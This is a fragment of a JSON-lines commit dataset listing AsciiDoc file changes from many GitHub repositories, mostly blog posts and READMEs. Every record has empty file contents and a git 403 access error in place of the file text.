error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d27382f38544f8f6490111374a31b7e6488ea86","subject":"Delete the file at '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","message":"Delete the file at '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fc3c1430065294b4a99d1f46ec9f6e8d1030ac4","subject":"fixing a link","message":"fixing a link\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"183eda111e486ef6b28de78ef146376110d02478","subject":"lecture part 1 on chapter 09","message":"lecture part 1 on chapter 09\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture06_20170925.adoc","new_file":"lecture06_20170925.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cfa68f06a15dcc99442d1ef05291744bf35e7d9","subject":"updated description of apoc user guide","message":"updated description of apoc user guide\n","repos":"inserpio\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d31e0fc429c0f7003255ee7ac404876294184d0b","subject":"Update 2015-05-03-Weihenstephan-mit-Wolken.adoc","message":"Update 2015-05-03-Weihenstephan-mit-Wolken.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-03-Weihenstephan-mit-Wolken.adoc","new_file":"_posts\/2015-05-03-Weihenstephan-mit-Wolken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2351ec3e4e475cddc8eaf36478469c4de469c105","subject":"Update 2015-06-09-JS-ES6-language-features.adoc","message":"Update 
2015-06-09-JS-ES6-language-features.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36c0fb069c0091a6fd1c99194c4cbf0b2a8b0db9","subject":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","message":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ec1ee39b4aa7b30783f26bb70500441ec9a5e05","subject":"Import release notes for Groovy 1.7","message":"Import release notes for Groovy 1.7\n","repos":"PascalSchumacher\/groovy-website,webkaz\/groovy-website,benignbala\/groovy-website,groovy\/groovy-website,sdkman\/sdkman-website,kevintanhongann\/groovy-website,rahulsom\/sdkman-website,m-ullrich\/groovy-website,marc0der\/groovy-website,sdkman\/sdkman-website,kevintanhongann\/groovy-website,benignbala\/groovy-website,dmesu\/sdkman-website,groovy\/groovy-website,marcoVermeulen\/groovy-website,dmesu\/sdkman-website,marc0der\/groovy-website,marcoVermeulen\/groovy-website,rahulsom\/sdkman-website,webkaz\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-1.7.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-1.7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c2850650fcdf6f38a4880425ff479400efaed9a","subject":"Import release notes for Groovy 2.4","message":"Import release notes for Groovy 2.4\n","repos":"m-ullrich\/groovy-website,benignbala\/groovy-website,rahulsom\/sdkman-website,webkaz\/groovy-website,groovy\/groovy-website,marc0der\/groovy-website,kevintanhongann\/groovy-website,benignbala\/groovy-website,webkaz\/groovy-website,marcoVermeulen\/groovy-website,kevintanhongann\/groovy-website,sdkman\/sdkman-website,marc0der\/groovy-website,sdkman\/sdkman-website,groovy\/groovy-website,dmesu\/sdkman-website,rahulsom\/sdkman-website,marcoVermeulen\/groovy-website,dmesu\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.4.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98a693c89df0c8cd3c08c228159b650efb70afc5","subject":"Update 2015-04-15-Mon-Blog.adoc","message":"Update 
2015-04-15-Mon-Blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdba7c1b119ac56beac3057874274ca2be46985f","subject":"Update 2015-04-15-Mon-Blog.adoc","message":"Update 2015-04-15-Mon-Blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a7dece734518eff0491bdfb4f721a16e02e540b","subject":"Update 2015-09-06-Second-Post.adoc","message":"Update 2015-09-06-Second-Post.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-06-Second-Post.adoc","new_file":"_posts\/2015-09-06-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"751a8e5dadcf420a46f9d99f36be249e5d1490d2","subject":"Update 2015-11-25-My-title.adoc","message":"Update 2015-11-25-My-title.adoc","repos":"jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io","old_file":"_posts\/2015-11-25-My-title.adoc","new_file":"_posts\/2015-11-25-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jakkypan\/jakkypan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"766a0ac4188f2b357e8ce98ec3913ed25ef5addb","subject":"Update 2016-11-19-Ankurs-blog.adoc","message":"Update 2016-11-19-Ankurs-blog.adoc","repos":"yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io","old_file":"_posts\/2016-11-19-Ankurs-blog.adoc","new_file":"_posts\/2016-11-19-Ankurs-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yuyudhan\/yuyudhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f472ffc7c0a6245171ab30456d1691bf527f8786","subject":"Update 2017-02-17-jquery-xxxx.adoc","message":"Update 2017-02-17-jquery-xxxx.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e81ce1ff7ff969d2f244d71fe9f3b8591e31c80","subject":"Update 2018-02-06-Concurrency.adoc","message":"Update 
2018-02-06-Concurrency.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-02-06-Concurrency.adoc","new_file":"_posts\/2018-02-06-Concurrency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f41e5a45cf30ec91873b55230e2ac361caa56640","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"467b759040d3750ff68907431938043678bbcd61","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_man_from_the_eastern_europe.adoc","new_file":"content\/writings\/the_man_from_the_eastern_europe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3a31454205f0f26eb5204e180bfbe6d964f9b9f2","subject":"Update 2015-09-21-Introduction-to-Object.adoc","message":"Update 2015-09-21-Introduction-to-Object.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Introduction-to-Object.adoc","new_file":"_posts\/2015-09-21-Introduction-to-Object.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ce302e14ab375a166064d9bef0ca30506cbd00a","subject":"add articles","message":"add articles\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"articles.adoc","new_file":"articles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"a94de8587915ca79205b77fe0757c0163b4e7898","subject":"Update 2016-01-01-2016-The-goldern-year.adoc","message":"Update 2016-01-01-2016-The-goldern-year.adoc","repos":"JacobSamro\/blog,JacobSamro\/blog,JacobSamro\/blog","old_file":"_posts\/2016-01-01-2016-The-goldern-year.adoc","new_file":"_posts\/2016-01-01-2016-The-goldern-year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobSamro\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e3a22998f91f855eba4ce6f97da2da75e6efb11","subject":"Update 2017-05-06-Saturday-May-6th-2017.adoc","message":"Update 
2017-05-06-Saturday-May-6th-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-05-06-Saturday-May-6th-2017.adoc","new_file":"_posts\/2017-05-06-Saturday-May-6th-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ada18ac99b7f340317de43ea5382d04dc4a999e6","subject":"[docs] - Update 1.1 release notes for Python.","message":"[docs] - Update 1.1 release notes for Python.\n\nIncludes various notes about changes to the Python client in the\n1.1 release.\n\nChange-Id: Icac07a016c3707ff5a4a027f8a07ea112318c790\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4998\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cef1ef3a9a1cf6e1f1a8dd62f1e57830d53905c","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6acba778803a2c47489ed3f8a328e3ee0eb2107d","subject":"Update 2017-10-08-Getting-started-with-AWS.adoc","message":"Update 2017-10-08-Getting-started-with-AWS.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-08-Getting-started-with-AWS.adoc","new_file":"_posts\/2017-10-08-Getting-started-with-AWS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d296bdf7d6d3f57bdce63ac3b2e896483fae0700","subject":"Update 2017-02-27-Episode-90-Test-Post.adoc","message":"Update 2017-02-27-Episode-90-Test-Post.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-27-Episode-90-Test-Post.adoc","new_file":"_posts\/2017-02-27-Episode-90-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe945631a2a18f54aa0710d04c116a7a4c8f653e","subject":"Update 2016-02-12-Why.adoc","message":"Update 2016-02-12-Why.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-Why.adoc","new_file":"_posts\/2016-02-12-Why.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ee954024ab32bab47bc65197094d11a66c0e0f4","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"792075ebcc37226210408aaf65ffce8adb6d6182","subject":"Update 2015-02-25-Por-que-amo-lo-que-hago.adoc","message":"Update 2015-02-25-Por-que-amo-lo-que-hago.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-25-Por-que-amo-lo-que-hago.adoc","new_file":"_posts\/2015-02-25-Por-que-amo-lo-que-hago.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b5e0cc94540bd1993a5fd82afba77d73cf86b90","subject":"Changing image name","message":"Changing image name\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"004440915ddbda8980923a9cd1fa7ce2edfe5d6e","subject":"y2b create post Headphones Made Of Wood!","message":"y2b create post Headphones Made Of 
Wood!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-14-Headphones-Made-Of-Wood.adoc","new_file":"_posts\/2016-05-14-Headphones-Made-Of-Wood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61b9e66fc60429990296b8ed98edd4596a51b07f","subject":"Update 2017-09-18-Functional-Rotterdam-15.adoc","message":"Update 2017-09-18-Functional-Rotterdam-15.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2017-09-18-Functional-Rotterdam-15.adoc","new_file":"_posts\/2017-09-18-Functional-Rotterdam-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f5cb768e3e12b7befbb10d9ce13ad1f922f7cc","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e707b0169c9952996dbb9816a360473a9d64aa65","subject":"Update readme file","message":"Update readme file\n","repos":"Adopt-a-JSR\/JCache-CDI","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Adopt-a-JSR\/JCache-CDI.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94292cbb82aeacfd5510b7dbddf542490fed1fe6","subject":"Adds README with ASCIIDoc format, will replace exisiting","message":"Adds README with ASCIIDoc format, will replace exisiting\n","repos":"HelioGuilherme66\/RIDE,robotframework\/RIDE,robotframework\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HelioGuilherme66\/RIDE.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d47e1b9be8bcaca1b59102debacf87787d94a0d4","subject":"added documentation","message":"added documentation\n","repos":"hivemq\/hivemq-hello-world-plugin,yongjhih\/rx-hivemq,yongjhih\/rx-hivemq,yongjhih\/rx-hivemq,hivemq\/hivemq-delete-retained-messages-recursively-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/hivemq-hello-world-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a4125711d0b1037639ddb0618149aa085e8bdc1","subject":"added README","message":"added README\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 
403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3e4b7f1a0931e8a4416238abf1b8d2798834e841","subject":"Update 2017-07-05-Test-on-Header-Image.adoc","message":"Update 2017-07-05-Test-on-Header-Image.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-05-Test-on-Header-Image.adoc","new_file":"_posts\/2017-07-05-Test-on-Header-Image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f2a32ed97cdfe6a389dda5f386cc501e0cf97a1","subject":"Fix README","message":"Fix README\n","repos":"pjanouch\/termo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/termo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1f1a3fdd00e16550863b664bf15cd9fecafc91c","subject":"Readme initial install was missing -P clone in Readme","message":"Readme initial install was missing -P clone in Readme\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a711910af74319c44afd4aae9d9847a711fefe0","subject":"Switch back to travis","message":"Switch back to travis\n","repos":"lburgazzoli\/hazelcast-discovery-dns","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/hazelcast-discovery-dns.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97b068150d467f14e82fd56a4ceb51d53ef53678","subject":"Added twitter batch","message":"Added twitter batch","repos":"johanhammar\/markup-document-builder,ronsmits\/markup-document-builder,Swagger2Markup\/markup-document-builder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronsmits\/markup-document-builder.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6518e4f825931af6f09d5454de989058c62a4fc","subject":"add clojurebridge seattle event","message":"add clojurebridge seattle event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_seattle.adoc","new_file":"content\/events\/2016\/clojurebridge_seattle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"758e261eb261a816231a1ccd093be354153b5567","subject":"y2b create post Sony DualShock 3 Charging Station Unboxing","message":"y2b create post Sony DualShock 3 Charging Station 
Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-23-Sony-DualShock-3-Charging-Station-Unboxing.adoc","new_file":"_posts\/2011-08-23-Sony-DualShock-3-Charging-Station-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b5e611077c2345952f524488d690318e5bb37d4","subject":"y2b create post I Bought The Cheapest Smartphone on Amazon...","message":"y2b create post I Bought The Cheapest Smartphone on Amazon...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-10-I-Bought-The-Cheapest-Smartphone-on-Amazon.adoc","new_file":"_posts\/2018-02-10-I-Bought-The-Cheapest-Smartphone-on-Amazon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d04988f3a07239194c11b99fa0e55cd8c4c8663a","subject":"notes","message":"notes\n","repos":"mannyfin\/IRAS,mannyfin\/IRAS","old_file":"GUA work\/GUA papers\/Quick Notes on papers\/Notes TPD HREELS of GUA on Zn Pt(111).adoc","new_file":"GUA work\/GUA 